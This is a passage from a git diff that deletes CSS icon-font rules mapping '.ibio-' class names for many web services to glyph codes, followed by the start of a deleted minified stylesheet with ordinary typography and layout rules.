-.ibio-activecampaign:before { content: "\f101"; } -.ibio-activision:before { content: "\f102"; } -.ibio-advisorycloud:before { content: "\f103"; } -.ibio-airchat:before { content: "\f316"; } -.ibio-alleventsin:before { content: "\f2f9"; } -.ibio-alltrails:before { content: "\f104"; } -.ibio-aluacom:before { content: "\f30a"; } -.ibio-amazingradio:before { content: "\f356"; } -.ibio-amazonwishlist:before { content: "\f105"; } -.ibio-anobii:before { content: "\f33e"; } -.ibio-apple-books:before { content: "\f106"; } -.ibio-arbonne:before { content: "\f107"; } -.ibio-arena:before { content: "\f108"; } -.ibio-arrivala:before { content: "\f300"; } -.ibio-artistree:before { content: "\f109"; } -.ibio-artpal:before { content: "\f10a"; } -.ibio-audiocom:before { content: "\f10b"; } -.ibio-audiotool:before { content: "\f10c"; } -.ibio-aweber:before { content: "\f10d"; } -.ibio-backloggd:before { content: "\f2eb"; } -.ibio-beatport:before { content: "\f10e"; } -.ibio-beehiiv:before { content: "\f10f"; } -.ibio-belletristica:before { content: "\f33f"; } -.ibio-bitview:before { content: "\f301"; } -.ibio-bluesky:before { content: "\f110"; } -.ibio-blueskyold:before { content: "\f2f2"; } -.ibio-bollyx:before { content: "\f340"; } -.ibio-boltplustv:before { content: "\f111"; } -.ibio-bonfire:before { content: "\f112"; } -.ibio-book:before { content: "\f113"; } -.ibio-book-of-the-month:before { content: "\f114"; } -.ibio-bookdinners:before { content: "\f2fa"; } -.ibio-booknode:before { content: "\f337"; } -.ibio-booksirens:before { content: "\f302"; } -.ibio-bookwyrm:before { content: "\f115"; } -.ibio-bookyogaretreat:before { content: "\f116"; } -.ibio-boostyto:before { content: "\f324"; } -.ibio-boothpm:before { content: "\f117"; } -.ibio-brevo:before { content: "\f118"; } -.ibio-btclighting:before { content: "\f325"; } -.ibio-byfans:before { content: "\f119"; } -.ibio-cafecito:before { content: "\f2ed"; } -.ibio-calaxy:before { content: "\f11a"; } -.ibio-campaignmonitor:before { content: "\f2f7"; } -.ibio-capcut:before { content: "\f11b"; } -.ibio-caraapp:before { content: "\f357"; } -.ibio-channelio:before { content: "\f11c"; } -.ibio-cifra:before { content: "\f31b"; } -.ibio-circlmobility:before { content: "\f341"; } -.ibio-clickasnap:before { content: "\f11d"; } -.ibio-cohostorg:before { content: "\f11e"; } -.ibio-commonninja:before { content: "\f34c"; } -.ibio-concertarchives:before { content: "\f11f"; } -.ibio-contracom:before { content: "\f120"; } -.ibio-convertkit:before { content: "\f121"; } -.ibio-crexi:before { content: "\f122"; } -.ibio-crowdin:before { content: "\f123"; } -.ibio-cryptocom:before { content: "\f124"; } -.ibio-curated:before { content: "\f2f3"; } -.ibio-cyberimpact:before { content: "\f322"; } -.ibio-dailyhunt:before { content: "\f329"; } -.ibio-deliveroo:before { content: "\f125"; } -.ibio-dhgate:before { content: "\f126"; } -.ibio-diamondapp:before { content: "\f127"; } -.ibio-digistore24:before { content: "\f128"; } -.ibio-dnldnft:before { content: "\f32a"; } -.ibio-dogecoin:before { content: "\f32b"; } -.ibio-domestika:before { content: "\f129"; } -.ibio-doneru:before { content: "\f12a"; } -.ibio-doordash:before { content: "\f12b"; } -.ibio-drip:before { content: "\f2f5"; } -.ibio-easports:before { content: "\f12c"; } -.ibio-ecomail:before { content: "\f12d"; } -.ibio-edmtrain:before { content: "\f12e"; } -.ibio-effectivealtruism:before { content: "\f12f"; } -.ibio-elfsight:before { content: "\f33d"; } -.ibio-emailoctopus:before { content: "\f130"; } -.ibio-enjoeibr:before { content: "\f131"; } -.ibio-envato:before { content: "\f132"; } -.ibio-etoro:before { content: "\f30b"; } -.ibio-eventix:before { content: "\f133"; } -.ibio-ezbio:before { content: "\f134"; } -.ibio-f6s:before { content: "\f135"; } -.ibio-fablebookclub:before { content: "\f136"; } -.ibio-fambase:before { content: "\f2fb"; } -.ibio-fanpage:before { content: "\f137"; } -.ibio-fantia:before { content: "\f138"; } -.ibio-farcasterxyz:before { content: "\f331"; } -.ibio-fineartamerica:before { content: "\f139"; } -.ibio-five-rise-records:before { content: "\f13a"; } -.ibio-flipsnack:before { content: "\f34d"; } -.ibio-flo:before { content: "\f13b"; } -.ibio-fluentcrm:before { content: "\f30c"; } -.ibio-fortnite:before { content: "\f317"; } -.ibio-freshcut:before { content: "\f13c"; } -.ibio-friendtok:before { content: "\f13d"; } -.ibio-funanl:before { content: "\f13e"; } -.ibio-gamerprofiles:before { content: "\f342"; } -.ibio-geneva:before { content: "\f303"; } -.ibio-getyourguide:before { content: "\f31f"; } -.ibio-ghostorg-alt:before { content: "\f13f"; } -.ibio-ghostorg-circle:before { content: "\f140"; } -.ibio-gifty:before { content: "\f2fc"; } -.ibio-givecampus:before { content: "\f141"; } -.ibio-gmail:before { content: "\f142"; } -.ibio-google-calendar:before { content: "\f143"; } -.ibio-googleads:before { content: "\f33c"; } -.ibio-googleanalytics:before { content: "\f144"; } -.ibio-googlemeet:before { content: "\f145"; } -.ibio-grainery:before { content: "\f146"; } -.ibio-hearnow:before { content: "\f147"; } -.ibio-herbalife:before { content: "\f148"; } -.ibio-heroheroco:before { content: "\f149"; } -.ibio-hevy:before { content: "\f30d"; } -.ibio-hipstamatic:before { content: "\f2ee"; } -.ibio-hivesocial:before { content: "\f14a"; } -.ibio-humanitix:before { content: "\f14b"; } -.ibio-idus:before { content: "\f14c"; } -.ibio-ifood:before { content: "\f14d"; } -.ibio-ifttt:before { content: "\f14e"; } -.ibio-igsched:before { content: "\f14f"; } -.ibio-igstory:before { content: "\f150"; } -.ibio-igsync:before { content: "\f151"; } -.ibio-inkedgaming:before { content: "\f152"; } -.ibio-inkitt:before { content: "\f326"; } -.ibio-instagramchannel:before { content: "\f343"; } -.ibio-integrately:before { content: "\f153"; } -.ibio-invitationcodes:before { content: "\f154"; } -.ibio-irc:before { content: "\f155"; } -.ibio-ircprotocol:before { content: "\f156"; } -.ibio-jimdo:before { content: "\f157"; } -.ibio-joinentre:before { content: "\f158"; } -.ibio-jooxmusic:before { content: "\f159"; } -.ibio-kickstreaming:before { content: "\f15a"; } -.ibio-kindle:before { content: "\f31c"; } -.ibio-kivaorg:before { content: "\f15b"; } -.ibio-kkbb:before { content: "\f15c"; } -.ibio-klaviyo:before { content: "\f15d"; } -.ibio-klicktipp:before { content: "\f15e"; } -.ibio-klook:before { content: "\f15f"; } -.ibio-knowt:before { content: "\f160"; } -.ibio-konectgg:before { content: "\f161"; } -.ibio-kworkcom:before { content: "\f162"; } -.ibio-langit-musik:before { content: "\f163"; } -.ibio-lapse:before { content: "\f332"; } -.ibio-lattescnpq:before { content: "\f164"; } -.ibio-learnworlds:before { content: "\f165"; } -.ibio-leboncoin:before { content: "\f166"; } -.ibio-leetcode:before { content: "\f167"; } -.ibio-lemon8:before { content: "\f168"; } -.ibio-lemonsqueezy:before { content: "\f169"; } -.ibio-lensxyz:before { content: "\f333"; } -.ibio-leonardoai:before { content: "\f31d"; } -.ibio-liberapay:before { content: "\f16a"; } -.ibio-linedashed:before { content: "\f338"; } -.ibio-linesolid:before { content: "\f339"; } -.ibio-linesolidthicker:before { content: "\f33a"; } -.ibio-linesolidthickest:before { content: "\f33b"; } -.ibio-linkme:before { content: "\f16b"; } -.ibio-livechat:before { content: "\f16c"; } -.ibio-lnkbio:before { content: "\f16d"; } -.ibio-lnkbio-circle:before { content: "\f16e"; } -.ibio-lnkbio-square:before { content: "\f16f"; } -.ibio-localscom:before { content: "\f170"; } -.ibio-loop-store:before { content: "\f171"; } -.ibio-loopnet:before { content: "\f172"; } -.ibio-loopsso:before { content: "\f323"; } -.ibio-magicedenio:before { content: "\f173"; } -.ibio-mailerlite:before { content: "\f174"; } -.ibio-mailjet:before { content: "\f2f6"; } -.ibio-make:before { content: "\f175"; } -.ibio-mercadopago:before { content: "\f176"; } -.ibio-michaelscom:before { content: "\f30e"; } -.ibio-midjourney:before { content: "\f177"; } -.ibio-mieuxenseigner:before { content: "\f318"; } -.ibio-minecraftwiki:before { content: "\f304"; } -.ibio-miningpoolstats:before { content: "\f178"; } -.ibio-miodottore-it:before { content: "\f358"; } -.ibio-mipicco:before { content: "\f179"; } -.ibio-mixxedfit:before { content: "\f344"; } -.ibio-moosend:before { content: "\f2f4"; } -.ibio-mspowerautomate:before { content: "\f17a"; } -.ibio-mybrightwheel:before { content: "\f345"; } -.ibio-myfansse:before { content: "\f17b"; } -.ibio-mywishlistonline:before { content: "\f359"; } -.ibio-namemc:before { content: "\f17c"; } -.ibio-naverblog:before { content: "\f17d"; } -.ibio-naversmartstore:before { content: "\f17e"; } -.ibio-ncsmusic:before { content: "\f17f"; } -.ibio-neobook:before { content: "\f346"; } -.ibio-neopets:before { content: "\f180"; } -.ibio-new-west-records:before { content: "\f181"; } -.ibio-nexon:before { content: "\f347"; } -.ibio-nftify:before { content: "\f182"; } -.ibio-ngl:before { content: "\f2ef"; } -.ibio-nostr:before { content: "\f183"; } -.ibio-notecom:before { content: "\f184"; } -.ibio-omnisend:before { content: "\f2e9"; } -.ibio-opentable:before { content: "\f185"; } -.ibio-orintful:before { content: "\f186"; } -.ibio-outlook:before { content: "\f187"; } -.ibio-pabbly:before { content: "\f188"; } -.ibio-pangobooks:before { content: "\f189"; } -.ibio-paperpie:before { content: "\f18a"; } -.ibio-paypay:before { content: "\f18b"; } -.ibio-paysafecard:before { content: "\f18c"; } -.ibio-pebbleis:before { content: "\f18d"; } -.ibio-peertube:before { content: "\f2f0"; } -.ibio-penup:before { content: "\f18e"; } -.ibio-perrk:before { content: "\f2fd"; } -.ibio-piccadilly-records:before { content: "\f18f"; } -.ibio-pie-vinyl:before { content: "\f190"; } -.ibio-pintplease:before { content: "\f191"; } -.ibio-pipedream:before { content: "\f306"; } -.ibio-plaid-room-records:before { content: "\f192"; } -.ibio-plastichead:before { content: "\f193"; } -.ibio-platekompaniet:before { content: "\f194"; } -.ibio-platenzaak:before { content: "\f195"; } -.ibio-platinum-agency:before { content: "\f196"; } -.ibio-platomania:before { content: "\f197"; } -.ibio-plausible:before { content: "\f198"; } -.ibio-play-srf:before { content: "\f199"; } -.ibio-playpack-records:before { content: "\f19a"; } -.ibio-plusmusicpl:before { content: "\f19b"; } -.ibio-pnkslm:before { content: "\f19c"; } -.ibio-podcastics:before { content: "\f315"; } -.ibio-podcastsbykajabi:before { content: "\f19d"; } -.ibio-podigee:before { content: "\f19e"; } -.ibio-podimo:before { content: "\f19f"; } -.ibio-podlink:before { content: "\f1a0"; } -.ibio-poison-city-records:before { content: "\f1a1"; } -.ibio-ponto-frio:before { content: "\f1a2"; } -.ibio-pony-canyon:before { content: "\f1a3"; } -.ibio-pop-market:before { content: "\f1a4"; } -.ibio-pop-wig-records:before { content: "\f1a5"; } -.ibio-popde:before { content: "\f1a6"; } -.ibio-poponautde:before { content: "\f1a7"; } -.ibio-poptube:before { content: "\f1a8"; } -.ibio-popular-online:before { content: "\f1a9"; } -.ibio-port-merch:before { content: "\f1aa"; } -.ibio-postnews:before { content: "\f1ab"; } -.ibio-praisecharts:before { content: "\f1ac"; } -.ibio-prefect-records:before { content: "\f1ad"; } -.ibio-pressreader:before { content: "\f1ae"; } -.ibio-presto-music:before { content: "\f1af"; } -.ibio-print-gakufu:before { content: "\f1b0"; } -.ibio-printablescom:before { content: "\f1b1"; } -.ibio-printify:before { content: "\f1b2"; } -.ibio-proper-music:before { content: "\f1b3"; } -.ibio-properstar:before { content: "\f35a"; } -.ibio-protonmail:before { content: "\f1b4"; } -.ibio-psychologytoday:before { content: "\f1b5"; } -.ibio-pultru:before { content: "\f1b6"; } -.ibio-pure-indie-records:before { content: "\f1b7"; } -.ibio-pure-noise-records:before { content: "\f1b8"; } -.ibio-qbd-books:before { content: "\f1b9"; } -.ibio-qello:before { content: "\f1ba"; } -.ibio-qikplay:before { content: "\f1bb"; } -.ibio-qrates:before { content: "\f1bc"; } -.ibio-qub-musique:before { content: "\f1bd"; } -.ibio-rabid-records:before { content: "\f1be"; } -.ibio-racket-records:before { content: "\f1bf"; } -.ibio-radio-bob:before { content: "\f1c0"; } -.ibio-radio-eins:before { content: "\f1c1"; } -.ibio-radio-freccia:before { content: "\f1c2"; } -.ibio-rainbow-blonde:before { content: "\f1c3"; } -.ibio-raketph:before { content: "\f30f"; } -.ibio-rakuten:before { content: "\f1c4"; } -.ibio-rcast:before { content: "\f1c5"; } -.ibio-rdstation:before { content: "\f355"; } -.ibio-readings-australia:before { content: "\f1c6"; } -.ibio-real-groovy:before { content: "\f1c7"; } -.ibio-realityapp:before { content: "\f1c8"; } -.ibio-reaper-entertainment:before { content: "\f1c9"; } -.ibio-rebel-records:before { content: "\f1ca"; } -.ibio-recochoku:before { content: "\f1cb"; } -.ibio-record-collector:before { content: "\f1cc"; } -.ibio-record-pusher:before { content: "\f1cd"; } -.ibio-record-records:before { content: "\f1ce"; } -.ibio-record-shop-merurido:before { content: "\f1cf"; } -.ibio-records-with-merritt:before { content: "\f1d0"; } -.ibio-recroom:before { content: "\f2f1"; } -.ibio-red-bull-records-store:before { content: "\f1d1"; } -.ibio-red-eye-records:before { content: "\f1d2"; } -.ibio-reetail:before { content: "\f330"; } -.ibio-renaissanceapp:before { content: "\f310"; } -.ibio-rhein-konzerte:before { content: "\f1d3"; } -.ibio-rhythm-merch:before { content: "\f1d4"; } -.ibio-rillbar:before { content: "\f1d5"; } -.ibio-rinse-fm:before { content: "\f1d6"; } -.ibio-riotgames:before { content: "\f1d7"; } -.ibio-ripple:before { content: "\f32c"; } -.ibio-rise-records:before { content: "\f1d8"; } -.ibio-roadrunner-records-store:before { content: "\f1d9"; } -.ibio-rock-action-records:before { content: "\f1da"; } -.ibio-rock-serwis:before { content: "\f1db"; } -.ibio-rock-sound:before { content: "\f1dc"; } -.ibio-rock-this-town-records:before { content: "\f1dd"; } -.ibio-rockabilia:before { content: "\f1de"; } -.ibio-rockmall:before { content: "\f1df"; } -.ibio-rockmark:before { content: "\f1e0"; } -.ibio-rocktud:before { content: "\f1e1"; } -.ibio-roku:before { content: "\f1e2"; } -.ibio-rottentomatoes:before { content: "\f1e3"; } -.ibio-rubadub:before { content: "\f1e4"; } -.ibio-sainsburys:before { content: "\f1e5"; } -.ibio-salzers-records:before { content: "\f1e6"; } -.ibio-samsung:before { content: "\f1e7"; } -.ibio-sanborns:before { content: "\f1e8"; } -.ibio-sandmilk:before { content: "\f1e9"; } -.ibio-sarbacane:before { content: "\f35d"; } -.ibio-schnitzel-records:before { content: "\f1ea"; } -.ibio-scopus:before { content: "\f1eb"; } -.ibio-scratchmitedu:before { content: "\f1ec"; } -.ibio-scribehow:before { content: "\f320"; } -.ibio-scriv:before { content: "\f1ed"; } -.ibio-sdban:before { content: "\f1ee"; } -.ibio-secret-city-records:before { content: "\f1ef"; } -.ibio-secret-sounds:before { content: "\f1f0"; } -.ibio-secretly-store:before { content: "\f1f1"; } -.ibio-sendernet:before { content: "\f1f2"; } -.ibio-sendfox:before { content: "\f1f3"; } -.ibio-sendinblue:before { content: "\f1f4"; } -.ibio-sendpulse:before { content: "\f31e"; } -.ibio-sendx:before { content: "\f2f8"; } -.ibio-senja:before { content: "\f311"; } -.ibio-serializd:before { content: "\f1f5"; } -.ibio-serious-beats:before { content: "\f1f6"; } -.ibio-setlistfm:before { content: "\f1f7"; } -.ibio-setmore:before { content: "\f1f8"; } -.ibio-sharptone:before { content: "\f1f9"; } -.ibio-shecodesio:before { content: "\f1fa"; } -.ibio-sheet-music-plus:before { content: "\f1fb"; } -.ibio-shibainucoin:before { content: "\f32d"; } -.ibio-shogun-audio:before { content: "\f1fc"; } -.ibio-shop-pbs:before { content: "\f1fd"; } -.ibio-shop24direct:before { content: "\f1fe"; } -.ibio-shoplookio:before { content: "\f319"; } -.ibio-shopmy:before { content: "\f1ff"; } -.ibio-shoppercom:before { content: "\f200"; } -.ibio-shoppingat:before { content: "\f201"; } -.ibio-shoppymn:before { content: "\f202"; } -.ibio-shutterstock:before { content: "\f203"; } -.ibio-sideonedummy-records:before { content: "\f204"; } -.ibio-signum-records:before { content: "\f205"; } -.ibio-signup:before { content: "\f206"; } -.ibio-silva-screen-records:before { content: "\f207"; } -.ibio-silversneakers:before { content: "\f348"; } -.ibio-simfy-africa:before { content: "\f208"; } -.ibio-singtel:before { content: "\f209"; } -.ibio-sirius-xm:before { content: "\f20a"; } -.ibio-skiddle:before { content: "\f20b"; } -.ibio-skillr:before { content: "\f20c"; } -.ibio-skillshare:before { content: "\f20d"; } -.ibio-skip-the-dishes:before { content: "\f20e"; } -.ibio-sklepzmuzykapl:before { content: "\f20f"; } -.ibio-skoobe:before { content: "\f210"; } -.ibio-skool:before { content: "\f334"; } -.ibio-sky-go:before { content: "\f211"; } -.ibio-sky-tv:before { content: "\f212"; } -.ibio-slick:before { content: "\f213"; } -.ibio-slide-record-shop:before { content: "\f214"; } -.ibio-sm-entertainment:before { content: "\f215"; } -.ibio-smart-punk-records:before { content: "\f216"; } -.ibio-smart-usen:before { content: "\f217"; } -.ibio-smubu:before { content: "\f218"; } -.ibio-smule:before { content: "\f219"; } -.ibio-snackvideo:before { content: "\f21a"; } -.ibio-snortsocial:before { content: "\f21b"; } -.ibio-soar-music-group:before { content: "\f21c"; } -.ibio-solid-state-records:before { content: "\f21d"; } -.ibio-som-livre:before { content: "\f21e"; } -.ibio-soma-records:before { content: "\f21f"; } -.ibio-songtradr:before { content: "\f220"; } -.ibio-sonic-bookings:before { content: "\f221"; } -.ibio-sony-music:before { content: "\f222"; } -.ibio-sottotesi:before { content: "\f35b"; } -.ibio-soundee:before { content: "\f354"; } -.ibio-space-shower-music:before { content: "\f223"; } -.ibio-sparechange:before { content: "\f312"; } -.ibio-specialist-subjects-records:before { content: "\f224"; } -.ibio-speedstar-records:before { content: "\f225"; } -.ibio-spillcom:before { content: "\f226"; } -.ibio-spindizzy-records:before { content: "\f227"; } -.ibio-spinefarm-records:before { content: "\f228"; } -.ibio-spinlet:before { content: "\f229"; } -.ibio-spinnin-records:before { content: "\f22a"; } -.ibio-spinspin:before { content: "\f22b"; } -.ibio-spiritfanfics:before { content: "\f22c"; } -.ibio-spkr-media:before { content: "\f22d"; } -.ibio-spoutible:before { content: "\f22e"; } -.ibio-squadratscom:before { content: "\f22f"; } -.ibio-srf:before { content: "\f230"; } -.ibio-stage-entertainment:before { content: "\f231"; } -.ibio-standaard-boekhadel:before { content: "\f232"; } -.ibio-starhub:before { content: "\f233"; } -.ibio-starz:before { content: "\f234"; } -.ibio-statsfm:before { content: "\f235"; } -.ibio-stimulus-com:before { content: "\f236"; } -.ibio-stones-throw-records:before { content: "\f237"; } -.ibio-streamelements:before { content: "\f349"; } -.ibio-strongnation:before { content: "\f34a"; } -.ibio-sub-pop-mega-mart:before { content: "\f238"; } -.ibio-subk-shop:before { content: "\f239"; } -.ibio-sublime-merch-store:before { content: "\f23a"; } -.ibio-subtv-playlister:before { content: "\f23b"; } -.ibio-sun-records:before { content: "\f23c"; } -.ibio-sunrise-records:before { content: "\f23d"; } -.ibio-superpuma-records:before { content: "\f23e"; } -.ibio-supraphon:before { content: "\f23f"; } -.ibio-supraphonline-cd:before { content: "\f240"; } -.ibio-supreme-chaos-records:before { content: "\f241"; } -.ibio-svt-play:before { content: "\f242"; } -.ibio-swamp-records:before { content: "\f243"; } -.ibio-sweden-rock-magazine:before { content: "\f244"; } -.ibio-symplicitycom:before { content: "\f245"; } -.ibio-system-records:before { content: "\f246"; } -.ibio-systemeio:before { content: "\f2ea"; } -.ibio-t2:before { content: "\f247"; } -.ibio-taaze:before { content: "\f248"; } -.ibio-taiwanmobile:before { content: "\f249"; } -.ibio-takealot:before { content: "\f24a"; } -.ibio-takt1:before { content: "\f24b"; } -.ibio-talkshoplive:before { content: "\f24c"; } -.ibio-tall-bird-records:before { content: "\f24d"; } -.ibio-tango-discos:before { content: "\f24e"; } -.ibio-tapete-records:before { content: "\f24f"; } -.ibio-target:before { content: "\f250"; } -.ibio-tcgplayer:before { content: "\f251"; } -.ibio-telasa:before { content: "\f252"; } -.ibio-telecharge:before { content: "\f253"; } -.ibio-telia:before { content: "\f254"; } -.ibio-telstra:before { content: "\f255"; } -.ibio-tematika:before { content: "\f256"; } -.ibio-temu:before { content: "\f257"; } -.ibio-terabox:before { content: "\f258"; } -.ibio-termsandconditions:before { content: "\f34f"; } -.ibio-tesco:before { content: "\f259"; } -.ibio-testimonialto:before { content: "\f321"; } -.ibio-thaa-records:before { content: "\f25a"; } -.ibio-the-sound-of-vinyl:before { content: "\f25b"; } -.ibio-theatre-tickets-direct:before { content: "\f25c"; } -.ibio-thebase-in:before { content: "\f25d"; } -.ibio-themighty:before { content: "\f25e"; } -.ibio-threadless:before { content: "\f305"; } -.ibio-threads:before { content: "\f25f"; } -.ibio-ticket:before { content: "\f260"; } -.ibio-ticketbooth:before { content: "\f261"; } -.ibio-ticketek:before { content: "\f262"; } -.ibio-ticketline:before { content: "\f263"; } -.ibio-ticketmaster:before { content: "\f264"; } -.ibio-ticketone:before { content: "\f265"; } -.ibio-ticketportalcz:before { content: "\f266"; } -.ibio-ticketsmarche:before { content: "\f267"; } -.ibio-ticketstreamcz:before { content: "\f268"; } -.ibio-tickettailor:before { content: "\f269"; } -.ibio-ticketweb:before { content: "\f26a"; } -.ibio-tidio:before { content: "\f34e"; } -.ibio-tidycal:before { content: "\f26b"; } -.ibio-timetree:before { content: "\f26c"; } -.ibio-tipmeinth:before { content: "\f313"; } -.ibio-tistory:before { content: "\f26d"; } -.ibio-tkigv3:before { content: "\f26e"; } -.ibio-tksched:before { content: "\f26f"; } -.ibio-tksync:before { content: "\f270"; } -.ibio-toolroom-records:before { content: "\f271"; } -.ibio-tooth-nail-records:before { content: "\f272"; } -.ibio-top-j-records:before { content: "\f273"; } -.ibio-topshelf-records:before { content: "\f274"; } -.ibio-touchapp:before { content: "\f275"; } -.ibio-toutiao:before { content: "\f350"; } -.ibio-trackdrip:before { content: "\f276"; } -.ibio-trackitdown:before { content: "\f277"; } -.ibio-trakteer:before { content: "\f314"; } -.ibio-transfermarkt:before { content: "\f31a"; } -.ibio-transgressive-records:before { content: "\f278"; } -.ibio-trax-magazine:before { content: "\f279"; } -.ibio-tribel:before { content: "\f27a"; } -.ibio-tricatel:before { content: "\f27b"; } -.ibio-trontrx:before { content: "\f32e"; } -.ibio-tryhackme:before { content: "\f27c"; } -.ibio-tubi:before { content: "\f27d"; } -.ibio-tuneafrique:before { content: "\f27e"; } -.ibio-tunecore:before { content: "\f27f"; } -.ibio-tunespeak:before { content: "\f280"; } -.ibio-turbo-recordings:before { content: "\f281"; } -.ibio-turntable-city:before { content: "\f282"; } -.ibio-turntablelab:before { content: "\f283"; } -.ibio-twintpayment:before { content: "\f284"; } -.ibio-twitterx:before { content: "\f285"; } -.ibio-udiscover:before { content: "\f286"; } -.ibio-udux:before { content: "\f287"; } -.ibio-uiclap:before { content: "\f288"; } -.ibio-ukf:before { content: "\f289"; } -.ibio-ultra-shibuya:before { content: "\f28a"; } -.ibio-ulule:before { content: "\f28b"; } -.ibio-umg:before { content: "\f28c"; } -.ibio-ummalife:before { content: "\f35c"; } -.ibio-unbound:before { content: "\f28d"; } -.ibio-uncle-m:before { content: "\f28e"; } -.ibio-underdog-recordstore:before { content: "\f28f"; } -.ibio-underground-solushn:before { content: "\f290"; } -.ibio-unearthed-sounds:before { content: "\f291"; } -.ibio-unfd:before { content: "\f292"; } -.ibio-unlokme:before { content: "\f293"; } -.ibio-unser-ding:before { content: "\f294"; } -.ibio-unvale:before { content: "\f335"; } -.ibio-upc-tv:before { content: "\f295"; } -.ibio-uppwind-records:before { content: "\f296"; } -.ibio-uproxx:before { content: "\f297"; } -.ibio-utapass:before { content: "\f298"; } -.ibio-valley-entertainment:before { content: "\f299"; } -.ibio-van-records:before { content: "\f29a"; } -.ibio-vbout:before { content: "\f307"; } -.ibio-vbox7:before { content: "\f29b"; } -.ibio-veeps:before { content: "\f29c"; } -.ibio-veloviewer:before { content: "\f29d"; } -.ibio-velvet-music:before { content: "\f29e"; } -.ibio-venn-records:before { content: "\f29f"; } -.ibio-vernoshop:before { content: "\f2a0"; } -.ibio-verve-forecast:before { content: "\f2a1"; } -.ibio-verve-records:before { content: "\f2a2"; } -.ibio-vialma:before { content: "\f2a3"; } -.ibio-viaplay:before { content: "\f2a4"; } -.ibio-videociety:before { content: "\f2a5"; } -.ibio-videoload:before { content: "\f2a6"; } -.ibio-village-live-records:before { content: "\f2a7"; } -.ibio-village-sounds:before { content: "\f2a8"; } -.ibio-vinilo-record-store:before { content: "\f2a9"; } -.ibio-vintage-vinyl:before { content: "\f2aa"; } -.ibio-vinylcomau:before { content: "\f2ab"; } -.ibio-vodafone:before { content: "\f2ac"; } -.ibio-voiceshop:before { content: "\f2ad"; } -.ibio-void-vinyl:before { content: "\f2ae"; } -.ibio-voyo:before { content: "\f2af"; } -.ibio-vp-reggae:before { content: "\f2b0"; } -.ibio-vudu:before { content: "\f2b1"; } -.ibio-vuulm:before { content: "\f2b2"; } -.ibio-vvvid:before { content: "\f2b3"; } -.ibio-wallapop:before { content: "\f2b4"; } -.ibio-walletofsatoshi:before { content: "\f336"; } -.ibio-walmart:before { content: "\f2b5"; } -.ibio-ward-records:before { content: "\f2b6"; } -.ibio-warner-music:before { content: "\f2b7"; } -.ibio-waterloo-records:before { content: "\f2b8"; } -.ibio-we-are-vinyl:before { content: "\f2b9"; } -.ibio-webofscience:before { content: "\f2ba"; } -.ibio-wechatchannels:before { content: "\f351"; } -.ibio-wedonthavetime:before { content: "\f352"; } -.ibio-weezevent:before { content: "\f2bb"; } -.ibio-weltbild:before { content: "\f2bc"; } -.ibio-wenod-records:before { content: "\f2bd"; } -.ibio-werkdiscs:before { content: "\f2be"; } -.ibio-weserlabel:before { content: "\f2bf"; } -.ibio-west-one-music:before { content: "\f2c0"; } -.ibio-wetravel:before { content: "\f2ff"; } -.ibio-weverse:before { content: "\f2c1"; } -.ibio-wh-smith:before { content: "\f2c2"; } -.ibio-what-records:before { content: "\f2c3"; } -.ibio-whatsappchannel:before { content: "\f34b"; } -.ibio-whatsappgroup:before { content: "\f327"; } -.ibio-wichita-recordings:before { content: "\f2c4"; } -.ibio-wikiloc:before { content: "\f2c5"; } -.ibio-wildthing-records-store:before { content: "\f2c6"; } -.ibio-wink:before { content: "\f2c7"; } -.ibio-winylownia:before { content: "\f2c8"; } -.ibio-wise:before { content: "\f328"; } -.ibio-wishtender:before { content: "\f2c9"; } -.ibio-woodstock:before { content: "\f2ca"; } -.ibio-world-circuit:before { content: "\f2cb"; } -.ibio-world-of-music:before { content: "\f2cc"; } -.ibio-world-star-hip-hop:before { content: "\f2cd"; } -.ibio-worship-musician-magazine:before { content: "\f2ce"; } -.ibio-worship-together:before { content: "\f2cf"; } -.ibio-wowow:before { content: "\f2d0"; } -.ibio-wwe:before { content: "\f2d1"; } -.ibio-wynkmusic:before { content: "\f2d2"; } -.ibio-xiaomi:before { content: "\f2d3"; } -.ibio-xl-recordings:before { content: "\f2d4"; } -.ibio-xmpp:before { content: "\f2d5"; } -.ibio-xpfreelancer:before { content: "\f2fe"; } -.ibio-xtra-mile-recordings:before { content: "\f2d6"; } -.ibio-yacvoice:before { content: "\f2d7"; } -.ibio-yamano-music:before { content: "\f2d8"; } -.ibio-yep-roc-records:before { content: "\f2d9"; } -.ibio-youradio:before { content: "\f2da"; } -.ibio-yousee-musik:before { content: "\f2db"; } -.ibio-zaiko:before { content: "\f2dc"; } -.ibio-zavvi:before { content: "\f2dd"; } -.ibio-zbooni:before { content: "\f2de"; } -.ibio-zenyandex:before { content: "\f2df"; } -.ibio-zerodha:before { content: "\f2e0"; } -.ibio-zia-records:before { content: "\f2e1"; } -.ibio-ziggo:before { content: "\f2e2"; } -.ibio-zinio:before { content: "\f2e3"; } -.ibio-zipmessage:before { content: "\f2e4"; } -.ibio-zoho-campaigns:before { content: "\f2e5"; } -.ibio-zohoforms:before { content: "\f353"; } -.ibio-zoom:before { content: "\f2e6"; } -.ibio-zumba:before { content: "\f2e7"; } -.ibio-zvuk:before { content: "\f2e8"; } diff --git a/old/css/lnkbio.min.css b/old/css/lnkbio.min.css deleted file mode 100644 index 534fb98..0000000 --- a/old/css/lnkbio.min.css +++ /dev/null @@ -1 +0,0 @@ -:root{--newmilka:#C8AAF9}html,body,p,table,ul,li,tr,td,*,button,input,select{font-family:Roboto,sans-serif;letter-spacing:1px;font-size:14px}b,strong,h1,h2,h3,h4,h5{font-family:Roboto,sans-serif;letter-spacing:1px;font-weight:bold}.navbar-light .navbar-nav .nav-link{color:black}.navbar-brand i{margin-left:0!important;width:32.5px!important;height:31px!important}.font-calistoga{font-family:Calistoga,cursive}.navbar-brand .logo-text{font-size:20px;display:inline-block;position:relative;top:2px;font-family:Calistoga,cursive}.navbar-light .navbar-toggler{padding-right:0!important}.pt-4_5{padding-top:2.25rem}@media (min-width:768px){.pt-4_5{padding-top:1rem}.modal-header-bar{display:none}}.ts-smallest{font-size:10px!important}.ts-smallmed{font-size:11px!important}.ts-small{font-size:12.25px!important}.ts-normal{font-size:14px!important}.ts-medium{font-size:15px!important}.ts-bigger{font-size:16px!important}.ts-title{font-size:17.5px!important}.ts-bar{font-size:20px!important}.ts-internaltitle{font-size:22px!important}.ts-icons{font-size:24px!important}.ts-icons-public{font-size:28px!important}.ts-payment{font-size:30px!important}.ts-donglebutton{font-size:28px!important}.ts-icons-bigger{font-size:34px!important}.btn-pagnotta.ts-donglebutton{padding:4px 0 0 0}.btn-dongle-lineheight{line-height:25px;padding:10px 0 8px 